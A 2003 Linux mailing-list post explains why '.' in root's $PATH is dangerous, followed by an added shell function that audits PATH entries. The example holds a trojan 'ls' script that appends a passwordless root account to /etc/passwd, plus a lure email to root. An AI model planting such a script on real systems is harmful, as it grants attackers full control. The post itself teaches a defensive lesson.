[Gllug] What's so good about Debian?
Richard Jones
rich at annexia.org
Thu Oct 9 13:14:22 UTC 2003
On Thu, Oct 09, 2003 at 01:56:33PM +0100, Jack Bertram wrote:
> Actually, in DOS it doesn't need to be in your PATH, as the current
> directory is always checked. In Linux the current directory needs to be
> explicitly in the PATH.
And don't forget this is a security feature!
Having '.' in your $PATH (particularly if it's at the start of the
$PATH) is regarded as bad practice.
Let's say two users are using a machine, we'll call them root (who has
elevated privileges) and dr_evil.
dr_evil creates a file in his home directory called 'ls':
    cat > ls
    #!/bin/sh
    echo toot::0:0:root:/root:/bin/bash >> /etc/passwd
    ^D
    chmod 0755 ls
Now he sends an email to root:
    mail root
    Subject: Strange thing in my directory
    Hi root,
    Come and have a look at this strange file or something in my directory:
        cd /home/dr_evil
        ls
    .. will show you the file.
    Thanks, The doc.
    ^D
Now what happens if root has '.' at the beginning of his $PATH?
Rich.
--
Richard Jones. http://www.annexia.org/ http://freshmeat.net/users/rwmj
Merjis Ltd. http://www.merjis.com/ - all your business data are belong to you.
MONOLITH is an advanced framework for writing web applications in C, easier
than using Perl & Java, much faster and smaller, reusable widget-based arch,
database-backed, discussion, chat, calendaring:
http://www.annexia.org/freeware/monolith/
--
Gllug mailing list - Gllug at linux.co.uk
http://list.ftech.net/mailman/listinfo/gllug
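An added example, not part of the original post or the list archive: a POSIX sh function that audits a PATH string for the problem described in the message above. It goes beyond the post's '.' case to also report empty entries (which the shell treats as the current directory), relative entries, and world-writable directories; the name `audit_path` and the sample string are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): report PATH entries that make
# the shell search the current directory, or a directory others can write to.

# audit_path STRING
# Prints one line per risky entry as "position:kind:entry". The position
# matters because earlier entries win the command lookup.
# Returns 1 if anything was reported, 0 if the string is clean.
audit_path() {
    rest="$1:"              # sentinel colon so a trailing empty entry is seen
    pos=0
    rc=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # text before the first colon
        rest=${rest#*:}     # text after the first colon
        pos=$((pos + 1))
        case $entry in
            '') kind=empty ;;       # leading ":", trailing ":" or "::" mean cwd
            .)  kind=dot ;;
            /*) kind=
                # Absolute entry: flag it only if "other" has write permission.
                case $(ls -ldL "$entry" 2>/dev/null) in
                    d???????w*) kind=world-writable ;;
                esac ;;
            *)  kind=relative ;;    # resolved against cwd, same exposure
        esac
        if [ -n "$kind" ]; then
            printf '%s:%s:%s\n' "$pos" "$kind" "$entry"
            rc=1
        fi
    done
    return "$rc"
}

# Constructed sample: the situation from the post, '.' ahead of system dirs.
audit_path ".:/usr/local/bin:/usr/bin:/bin" || true
```

Run `audit_path "$PATH"` from root's login shell and from any script or cron environment that sets its own PATH; a clean result prints nothing and returns 0.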